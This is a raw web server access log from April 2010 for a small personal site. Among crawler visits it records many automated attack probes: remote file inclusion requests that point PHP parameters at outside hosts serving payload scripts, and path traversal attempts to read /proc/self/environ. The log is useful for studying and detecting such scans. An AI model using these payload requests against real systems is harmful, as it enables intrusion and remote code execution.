123.30.181.5 - - [28/Apr/2010:13:07:46 -0500] "GET ////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:46 -0500] "GET /logs////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 3479 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:49 -0500] "GET /logs/access_log.1225238400////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:49 -0500] "GET /logs////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 3479 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:49 -0500] "GET ////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:08:26 -0500] "GET /logs/access_log.1265760000////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:08:28 -0500] "GET /logs/access_log.1265760000////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.13.46 - - [28/Apr/2010:13:10:55 -0500] "GET /logs/access_log.1262044800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.223 - - [28/Apr/2010:13:11:15 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 333 "-""libwww-perl/5.831"
204.202.238.132 - - [28/Apr/2010:13:13:42 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.202.238.132 - - [28/Apr/2010:13:13:42 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.202.238.132 - - [28/Apr/2010:13:13:43 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:33 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:33 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:42 -0500] "GET /logs//hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:42 -0500] "GET /logs/access_log.1263081600//hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:42 -0500] "GET //hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:44 -0500] "GET //hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:44 -0500] "GET /logs//hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:14:44 -0500] "GET /logs/access_log.1263081600//hioxRandomAd.php?hm=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.115.111.248 - - [28/Apr/2010:13:15:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
77.92.94.85 - - [28/Apr/2010:13:15:57 -0500] "GET /setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
77.92.94.85 - - [28/Apr/2010:13:15:57 -0500] "GET /logs/setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
77.221.130.13 - - [28/Apr/2010:13:17:00 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:17:06 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:17:06 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:13:17:06 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.13.139 - - [28/Apr/2010:13:20:55 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.188 - - [28/Apr/2010:13:24:55 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.137.163.133 - - [28/Apr/2010:13:29:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [28/Apr/2010:13:29:24 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
77.221.130.13 - - [28/Apr/2010:13:29:25 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:13:29:33 -0500] "GET /artwork/trunks.htm HTTP/1.0" 200 1275 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/access_log.1225238400/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/access_log.1265760000/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/access_log.1225238400/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:29:46 -0500] "GET /logs/access_log.1265760000/include/mail.inc.php?skin_board_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:23 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:23 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:23 -0500] "GET /logs/access_log.1268611200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:23 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [28/Apr/2010:13:33:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.221.130.13 - - [28/Apr/2010:13:33:39 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:53 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:33:53 -0500] "GET /logs/access_log.1219363200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.46.199.179 - - [28/Apr/2010:13:34:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.126.254.139 - - [28/Apr/2010:13:35:38 -0500] "GET //dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:13:35:38 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:13:35:39 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.13.84 - - [28/Apr/2010:13:36:25 -0500] "GET /logs/access_log.1179792000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.126.254.139 - - [28/Apr/2010:13:36:26 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:13:36:26 -0500] "GET //dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:13:36:26 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:37:45 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:37:45 -0500] "GET //dloads/dloads-header.php?docroot=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:37:45 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:11 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:11 -0500] "GET //dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:11 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:29 -0500] "GET //dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:29 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.220.193.170 - - [28/Apr/2010:13:38:29 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.223.110.205 - - [28/Apr/2010:13:38:52 -0500] "GET /logs//index2.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
66.223.110.205 - - [28/Apr/2010:13:38:53 -0500] "GET //index2.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
211.174.185.131 - - [28/Apr/2010:13:39:00 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:39:00 -0500] "GET /logs/access_log.1219708800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:39:00 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:39:00 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
204.202.238.132 - - [28/Apr/2010:13:39:05 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
204.202.238.132 - - [28/Apr/2010:13:39:05 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
204.202.238.132 - - [28/Apr/2010:13:39:05 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:39:15 -0500] "GET /noticias.php?arq=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:39:15 -0500] "GET /logs/noticias.php?arq=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:39:15 -0500] "GET /logs/access_log.1264896000/noticias.php?arq=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:39:27 -0500] "GET /logs/access_log.1262390400/noticias.php?arq=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:40:04 -0500] "GET //dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:40:05 -0500] "GET /logs/access_log.1266364800//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:13:40:07 -0500] "GET /logs//dloads/dloads-header.php?docroot=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 314 "-""Mozilla/5.0"
199.120.90.223 - - [28/Apr/2010:13:45:56 -0500] "GET /logs/access_log.1214784000//components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 360 "-""libwww-perl/5.831"
199.120.90.223 - - [28/Apr/2010:13:45:59 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 333 "-""libwww-perl/5.831"
199.120.90.223 - - [28/Apr/2010:13:45:59 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 338 "-""libwww-perl/5.831"
89.108.71.108 - - [28/Apr/2010:13:46:10 -0500] "GET /logs/access_log.1268611200//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.833"
89.108.71.108 - - [28/Apr/2010:13:46:10 -0500] "GET //?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
89.108.71.108 - - [28/Apr/2010:13:46:10 -0500] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3477 "-""libwww-perl/5.833"
89.108.71.108 - - [28/Apr/2010:13:46:38 -0500] "GET /logs/access_log.1219363200//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.833"
128.241.54.188 - - [28/Apr/2010:13:48:33 -0500] "GET //ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
128.241.54.188 - - [28/Apr/2010:13:48:33 -0500] "GET /logs//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
128.241.54.188 - - [28/Apr/2010:13:48:33 -0500] "GET /logs/access_log.1270598400%20%20//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
128.241.54.188 - - [28/Apr/2010:13:48:55 -0500] "GET /logs/access_log.1268611200%20%20//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.207.70 - - [28/Apr/2010:13:49:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
128.241.54.188 - - [28/Apr/2010:13:50:05 -0500] "GET /logs/access_log.1270598400//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
128.241.54.188 - - [28/Apr/2010:13:50:11 -0500] "GET /logs/access_log.1268611200//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:05 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:05 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:05 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:05 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:35 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:35 -0500] "GET /logs/access_log.1219708800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:35 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.174.185.131 - - [28/Apr/2010:13:51:38 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.115.111.248 - - [28/Apr/2010:13:53:20 -0500] "GET /logs/access_log.1203206400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:22 -0500] "GET /logs/access_log.1203638400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:25 -0500] "GET /logs/access_log.1204243200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:27 -0500] "GET /logs/access_log.1204934400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:29 -0500] "GET /logs/access_log.1205884800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:32 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:34 -0500] "GET /logs/access_log.1206316800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:36 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:39 -0500] "GET /logs/access_log.1206748800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:42 -0500] "GET /logs/access_log.1207180800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:44 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:47 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:50 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:13:53:52 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
128.241.54.188 - - [28/Apr/2010:13:53:54 -0500] "GET /logs/access_log.1251504000//ws/get_reminders.php?includedir=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.195.223 - - [28/Apr/2010:13:53:55 -0500] "GET /logs/access_log.1165881600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [28/Apr/2010:13:53:55 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.41 - - [28/Apr/2010:14:00:55 -0500] "GET /logs/access_log.1201996800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.181 - - [28/Apr/2010:14:10:25 -0500] "GET /logs/access_log.1191715200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.67.20.117 - - [28/Apr/2010:14:13:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:14:13:26 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:14:13:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:14:13:30 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:14:16:45 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
